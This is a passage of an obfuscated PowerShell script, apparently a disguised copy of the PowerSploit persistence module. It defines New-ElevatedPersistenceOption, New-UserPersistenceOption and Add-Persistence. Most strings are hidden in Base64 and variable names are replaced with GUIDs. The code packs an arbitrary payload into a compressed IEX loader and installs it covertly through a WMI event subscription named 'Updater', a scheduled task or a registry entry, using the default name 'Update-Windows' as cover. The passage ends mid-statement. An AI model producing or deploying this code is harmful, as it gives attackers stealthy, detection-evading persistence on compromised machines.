.PARAMETER AtStartup 47 | 48 | Starts the payload within 240 and 325 seconds of computer startup. 49 | 50 | .PARAMETER OnIdle 51 | 52 | Starts the payload after one minute of idling. 53 | 54 | .PARAMETER Daily 55 | 56 | Starts the payload daily. 57 | 58 | .PARAMETER Hourly 59 | 60 | Starts the payload hourly. 61 | 62 | .PARAMETER At 63 | 64 | Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. 65 | 66 | .EXAMPLE 67 | 68 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' 69 | 70 | .EXAMPLE 71 | 72 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup 73 | 74 | .EXAMPLE 75 | 76 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle 77 | 78 | .LINK 79 | 80 | http://www.exploit-monday.com 81 | #> 82 | 83 | [CmdletBinding()] Param ( 84 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 85 | [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 86 | [Switch] 87 | ${aab497dd068647b8a6b3884c2e6601af}, 88 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 89 | [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 90 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 91 | [Switch] 92 | ${a0df28f799304c08843cb3989609cee7}, 93 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 94 | [Switch] 95 | ${bfc6f52cfedc4f2a9bfd185afe38c73c}, 96 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 97 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 98 | [Switch] 99 | ${bfba23cf4a3847a2ba47c59807b66d21}, 100 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 101 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 102 | [DateTime] 103 | ${c3e0a2af3f1c4ea18f97ff8170745963}, 104 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 105 | [Switch] 106 | ${cc7ad13128254d2b817259d011a81537}, 107 | [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 108 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 109 | [Switch] 110 | ${aac6e7631e3f4ca9a474a27d48d418dc}, 111 | [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 112 | [Switch] 113 | ${e90ad1f8c8a0427eae4ffbac9bdb0bcc} 114 | ) 115 | ${b0b6c50e0cdf49d197d90b6c83c82c87} = @{ 116 | Method = '' 117 | Trigger = '' 118 | Time = '' 119 | } 120 | switch ($PSCmdlet.ParameterSetName) 121 | { 122 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkAQQB0AFMAdABhAHIAdAB1AHAA'))) 123 | { 124 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkA'))) 125 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AFMAdABhAHIAdAB1AHAA'))) 126 | } 127 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkARABhAGkAbAB5AA=='))) 128 | { 129 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkA'))) 130 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 131 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQA=')))] = ${c3e0a2af3f1c4ea18f97ff8170745963} 132 | } 133 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA=='))) 134 | { 135 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 136 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 137 | } 138 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA='))) 139 | { 140 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 141 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 142 | } 143 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA'))) 144 | { 145 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 146 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 147 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQA=')))] = ${c3e0a2af3f1c4ea18f97ff8170745963} 148 | } 149 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 150 | { 151 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 152 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 153 | } 154 | } 155 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} = New-Object -TypeName PSObject -Property ${b0b6c50e0cdf49d197d90b6c83c82c87} 156 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4ARQBsAGUAdgBhAHQAZQBkAFAAZQByAHMAaQBzAHQAZQBuAGMAZQBPAHAAdABpAG8AbgA='))) 157 | echo ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} 158 | } 159 | function New-UserPersistenceOption 160 | { 161 | [CmdletBinding()] Param ( 162 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 163 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 164 | [Switch] 165 | ${a0df28f799304c08843cb3989609cee7}, 166 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 167 | [Switch] 168 | ${bfc6f52cfedc4f2a9bfd185afe38c73c}, 169 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 170 | [Switch] 171 | ${bfba23cf4a3847a2ba47c59807b66d21}, 172 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 173 | [DateTime] 174 | ${c3e0a2af3f1c4ea18f97ff8170745963}, 175 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 176 | [Switch] 177 | ${cc7ad13128254d2b817259d011a81537}, 178 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 179 | [Switch] 180 | ${aac6e7631e3f4ca9a474a27d48d418dc} 181 | ) 182 | ${b0b6c50e0cdf49d197d90b6c83c82c87} = @{ 183 | Method = '' 184 | Trigger = '' 185 | Time = '' 186 | } 187 | switch ($PSCmdlet.ParameterSetName) 188 | { 189 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA=='))) 190 | { 191 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 192 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 193 | } 194 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA='))) 195 | { 196 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 197 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 198 | } 199 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA'))) 200 | { 201 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 202 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 203 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQA=')))] = ${c3e0a2af3f1c4ea18f97ff8170745963} 204 | } 205 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 206 | { 207 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBlAHQAaABvAGQA')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 208 | ${b0b6c50e0cdf49d197d90b6c83c82c87}[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAGkAZwBnAGUAcgA=')))] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 209 | } 210 | } 211 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} = New-Object -TypeName PSObject -Property ${b0b6c50e0cdf49d197d90b6c83c82c87} 212 | ${c7e62b7eb22945b2a0d7c0c4d7a6a31c}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4AVQBzAGUAcgBQAGUAcgBzAGkAcwB0AGUAbgBjAGUATwBwAHQAaQBvAG4A'))) 213 | echo ${c7e62b7eb22945b2a0d7c0c4d7a6a31c} 214 | } 215 | function Add-Persistence 216 | { 217 | [CmdletBinding()] Param ( 218 | [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] 219 | [ValidateNotNullOrEmpty()] 220 | [ScriptBlock] 221 | ${e18e08602cf4478b9d3d5c8b2b498a6e}, 222 | [Parameter( Mandatory = $True, ParameterSetName = 'FilePath' )] 223 | [ValidateNotNullOrEmpty()] 224 | [Alias('Path')] 225 | [String] 226 | ${ab56d657cfc849ccbae01cd65d4f8c86}, 227 | [Parameter( Mandatory = $True )] 228 | ${cc4057f43ec0452aa83a64356d7ea926}, 229 | [Parameter( Mandatory = $True )] 230 | ${df8063b79a7a452ca1a2f7709c4fa2c5}, 231 | [ValidateNotNullOrEmpty()] 232 | [String] 233 | ${e1647abadf884b208ff363b3ef33e4b0} = 'Update-Windows', 234 | [String] 235 | ${ab2ac24b21dc4f71b4d86e7442187839} = "$PWD\Persistence.ps1", 236 | [String] 237 | ${ab4b6662c9a54dfab855d3a54a5f34c8} = "$PWD\RemovePersistence.ps1", 238 | [Switch] 239 | ${cf9bd0c2aaee4219940dc2dd6ab44219}, 240 | [Switch] 241 | ${a9f05a6260d64d84befdddce7da6437b} 242 | ) 243 | Set-StrictMode -Version 2 244 | if (${cc4057f43ec0452aa83a64356d7ea926}.PSObject.TypeNames[0] -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4ARQBsAGUAdgBhAHQAZQBkAFAAZQByAHMAaQBzAHQAZQBuAGMAZQBPAHAAdABpAG8AbgA=')))) 245 | { 246 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABwAHIAbwB2AGkAZABlAGQAIABpAG4AdgBhAGwAaQBkACAAZQBsAGUAdgBhAHQAZQBkACAAcABlAHIAcwBpAHMAdABlAG4AYwBlACAAbwBwAHQAaQBvAG4AcwAuAA=='))) 247 | } 248 | if (${df8063b79a7a452ca1a2f7709c4fa2c5}.PSObject.TypeNames[0] -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAcABsAG8AaQB0AC4AUABlAHIAcwBpAHMAdABlAG4AYwBlAC4AVQBzAGUAcgBQAGUAcgBzAGkAcwB0AGUAbgBjAGUATwBwAHQAaQBvAG4A')))) 249 | { 250 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABwAHIAbwB2AGkAZABlAGQAIABpAG4AdgBhAGwAaQBkACAAdQBzAGUAcgAtAGwAZQB2AGUAbAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMALgA='))) 251 | } 252 | ${8d8d49797b5b494095bad3098d94ec73} = gi ${ab2ac24b21dc4f71b4d86e7442187839} -ErrorAction SilentlyContinue 253 | if (${8d8d49797b5b494095bad3098d94ec73} -and ${8d8d49797b5b494095bad3098d94ec73}.PSIsContainer) 254 | { 255 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcAByAG8AdgBpAGQAZQAgAGEAIABmAGkAbABlACAAbgBhAG0AZQAgAHcAaQB0AGgAIAB0AGgAZQAgAFAAZQByAHMAaQBzAHQAZQBuAHQAUwBjAHIAaQBwAHQARgBpAGwAZQBQAGEAdABoACAAbwBwAHQAaQBvAG4ALgA='))) 256 | } 257 | ${8d8d49797b5b494095bad3098d94ec73} = gi ${ab4b6662c9a54dfab855d3a54a5f34c8} -ErrorAction SilentlyContinue 258 | if (${8d8d49797b5b494095bad3098d94ec73} -and ${8d8d49797b5b494095bad3098d94ec73}.PSIsContainer) 259 | { 260 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WQBvAHUAIABtAHUAcwB0ACAAcAByAG8AdgBpAGQAZQAgAGEAIABmAGkAbABlACAAbgBhAG0AZQAgAHcAaQB0AGgAIAB0AGgAZQAgAFIAZQBtAG8AdgBhAGwAUwBjAHIAaQBwAHQARgBpAGwAZQBQAGEAdABoACAAbwBwAHQAaQBvAG4ALgA='))) 261 | } 262 | ${6ec44f27fafd4f4081df07a619d3b5d3} = Split-Path ${ab2ac24b21dc4f71b4d86e7442187839} -ErrorAction Stop 263 | ${bb4042aa26d249b7b6511c0eca5de384} = Split-Path ${ab2ac24b21dc4f71b4d86e7442187839} -Leaf -ErrorAction Stop 264 | ${966f141aaef74dcaab3ffcd81c15f7b8} = '' 265 | ${188aaa68b84a471c8bc115bfaea60abf} = '' 266 | if (${6ec44f27fafd4f4081df07a619d3b5d3} -eq '') 267 | { 268 | ${966f141aaef74dcaab3ffcd81c15f7b8} = "$($PWD)\$(${bb4042aa26d249b7b6511c0eca5de384})" 269 | } 270 | else 271 | { 272 | ${966f141aaef74dcaab3ffcd81c15f7b8} = "$(rvpa ${6ec44f27fafd4f4081df07a619d3b5d3})\$(${bb4042aa26d249b7b6511c0eca5de384})" 273 | } 274 | ${12780249b85b47f6b2814bf8cdd82fcb} = Split-Path ${ab4b6662c9a54dfab855d3a54a5f34c8} -ErrorAction Stop 275 | ${bb4042aa26d249b7b6511c0eca5de384} = Split-Path ${ab4b6662c9a54dfab855d3a54a5f34c8} -Leaf -ErrorAction Stop 276 | if (${12780249b85b47f6b2814bf8cdd82fcb} -eq '') 277 | { 278 | ${188aaa68b84a471c8bc115bfaea60abf} = "$($PWD)\$(${bb4042aa26d249b7b6511c0eca5de384})" 279 | } 280 | else 281 | { 282 | ${188aaa68b84a471c8bc115bfaea60abf} = "$(rvpa ${12780249b85b47f6b2814bf8cdd82fcb})\$(${bb4042aa26d249b7b6511c0eca5de384})" 283 | } 284 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBQAGEAdABoAA==')))]) 285 | { 286 | $null = ls ${ab56d657cfc849ccbae01cd65d4f8c86} -ErrorAction Stop 287 | ${675e1081ca814260a8f2a0866f0d3c90} = [IO.File]::ReadAllText((rvpa ${ab56d657cfc849ccbae01cd65d4f8c86})) 288 | } 289 | else 290 | { 291 | ${675e1081ca814260a8f2a0866f0d3c90} = ${e18e08602cf4478b9d3d5c8b2b498a6e} 292 | } 293 | ${1408f8a6bb3246c78c37b8cee7559600} = '' 294 | ${5551831a2227477db4a61598ddf7fbc8} = '' 295 | ${50dd3889beaf444088a6e13beb8c3d8e} = '' 296 | ${d8effee50a3b401592d3653210566b62} = "''" 297 | ${f17dc4af4f9142bfa43c36189ff132e3} = '' 298 | ${5551831a2227477db4a61598ddf7fbc8} = "''" 299 | ${50dd3889beaf444088a6e13beb8c3d8e} = '' 300 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = '' 301 | ${e1f24fa15d1c4db89d15fca61ba29769} = ([Text.Encoding]::ASCII).GetBytes(${675e1081ca814260a8f2a0866f0d3c90}) 302 | ${ef4b24abe87943a88ef76082d3166e5e} = New-Object IO.MemoryStream 303 | ${a14b542eec4e4d87994b58ae8e913be3} = New-Object IO.Compression.DeflateStream (${ef4b24abe87943a88ef76082d3166e5e}, [IO.Compression.CompressionMode]::Compress) 304 | ${a14b542eec4e4d87994b58ae8e913be3}.Write(${e1f24fa15d1c4db89d15fca61ba29769}, 0, ${e1f24fa15d1c4db89d15fca61ba29769}.Length) 305 | ${a14b542eec4e4d87994b58ae8e913be3}.Dispose() 306 | ${fbba6939cd024a8fb2af35fa08b9c46b} = ${ef4b24abe87943a88ef76082d3166e5e}.ToArray() 307 | ${ef4b24abe87943a88ef76082d3166e5e}.Dispose() 308 | ${dcf69cf59efe4edd99f4a6fab7aeca8a} = [Convert]::ToBase64String(${fbba6939cd024a8fb2af35fa08b9c46b}) 309 | ${bdde8df95b13416abc69e7f89b90b98e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAA=='))) + "'${dcf69cf59efe4edd99f4a6fab7aeca8a}'" + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA='))) 310 | switch (${cc4057f43ec0452aa83a64356d7ea926}.Method) 311 | { 312 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABlAHIAbQBhAG4AZQBuAHQAVwBNAEkA'))) 313 | { 314 | ${f17dc4af4f9142bfa43c36189ff132e3} = { 315 | gwmi __eventFilter -namespace root\subscription -filter $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBhAG0AZQA9ACcAVQBwAGQAYQB0AGUAcgAnAA==')))| Remove-WmiObject 316 | gwmi CommandLineEventConsumer -Namespace root\subscription -filter $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBhAG0AZQA9ACcAVQBwAGQAYQB0AGUAcgAnAA=='))) | Remove-WmiObject 317 | gwmi __FilterToConsumerBinding -Namespace root\subscription | ? { $_.filter -match $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBwAGQAYQB0AGUAcgA=')))} | Remove-WmiObject 318 | } 319 | switch (${cc4057f43ec0452aa83a64356d7ea926}.Trigger) 320 | { 321 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AFMAdABhAHIAdAB1AHAA'))) 322 | { 323 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBgACQARgBpAGwAdABlAHIAPQBTAGUAdAAtAFcAbQBpAEkAbgBzAHQAYQBuAGMAZQAgAC0AQwBsAGEAcwBzACAAXwBfAEUAdgBlAG4AdABGAGkAbAB0AGUAcgAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIABgACIAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAGAAIgAgAC0AQQByAGcAdQBtAGUAbgB0AHMAIABAAHsAbgBhAG0AZQA9ACcAVQBwAGQAYQB0AGUAcgAnADsARQB2AGUAbgB0AE4AYQBtAGUAUwBwAGEAYwBlAD0AJwByAG8AbwB0AFwAQwBpAG0AVgAyACcAOwBRAHUAZQByAHkATABhAG4AZwB1AGEAZwBlAD0AYAAiAFcAUQBMAGAAIgA7AFEAdQBlAHIAeQA9AGAAIgBTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAAXwBfAEkAbgBzAHQAYQBuAGMAZQBNAG8AZABpAGYAaQBjAGEAdABpAG8AbgBFAHYAZQBuAHQAIABXAEkAVABIAEkATgAgADYAMAAgAFcASABFAFIARQAgAFQAYQByAGcAZQB0AEkAbgBzAHQAYQBuAGMAZQAgAEkAUwBBACAAJwBXAGkAbgAzADIAXwBQAGUAcgBmAEYAbwByAG0AYQB0AHQAZQBkAEQAYQB0AGEAXwBQAGUAcgBmAE8AUwBfAFMAeQBzAHQAZQBtACcAIABBAE4ARAAgAFQAYQByAGcAZQB0AEkAbgBzAHQAYQBuAGMAZQAuAFMAeQBzAHQAZQBtAFUAcABUAGkAbQBlACAAPgA9ACAAMgA0ADAAIABBAE4ARAAgAFQAYQByAGcAZQB0AEkAbgBzAHQAYQBuAGMAZQAuAFMAeQBzAHQAZQBtAFUAcABUAGkAbQBlACAAPAAgADMAMgA1AGAAIgB9ADsAYAAkAEMAbwBuAHMAdQBtAGUAcgA9AFMAZQB0AC0AVwBtAGkASQBuAHMAdABhAG4AYwBlACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAGAAIgByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AYAAiACAALQBDAGwAYQBzAHMAIAAnAEMAbwBtAG0AYQBuAGQATABpAG4AZQBFAHYAZQBuAHQAQwBvAG4AcwB1AG0AZQByACcAIAAtAEEAcgBnAHUAbQBlAG4AdABzACAAQAB7ACAAbgBhAG0AZQA9ACcAVQBwAGQAYQB0AGUAcgAnADsAQwBvAG0AbQBhAG4AZABMAGkAbgBlAFQAZQBtAHAAbABhAHQAZQA9AGAAIgBgACQAKABgACQARQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACkAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBOAG8AbgBJAG4AdABlAHIAYQBjAHQAaQB2AGUAYAAiADsAUgB1AG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlAGwAeQA9ACcAZgBhAGwAcwBlACcAfQA7AFMAZQB0AC0AVwBtAGkASQBuAHMAdABhAG4AYwBlACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAGAAIgByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AYAAiACAALQBDAGwAYQBzAHMAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBBAHIAZwB1AG0AZQBuAHQAcwAgAEAAewBGAGkAbAB0AGUAcgA9AGAAJABGAGkAbAB0AGUAcgA7AEMAbwBuAHMAdQBtAGUAcgA9AGAAJABDAG8AbgBzAHUAbQBlAHIAfQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAIgA='))) 324 | } 325 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 326 | { 327 | ${d8effee50a3b401592d3653210566b62} = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $(${cc4057f43ec0452aa83a64356d7ea926}.Time.ToString('HH')) AND TargetInstance.Minute = $(${cc4057f43ec0452aa83a64356d7ea926}.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" 328 | } 329 | default 330 | { 331 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGUAbABlAHYAYQB0AGUAZAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMAIABwAHIAbwB2AGkAZABlAGQAIQA='))) 332 | } 333 | } 334 | } 335 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 336 | { 337 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = 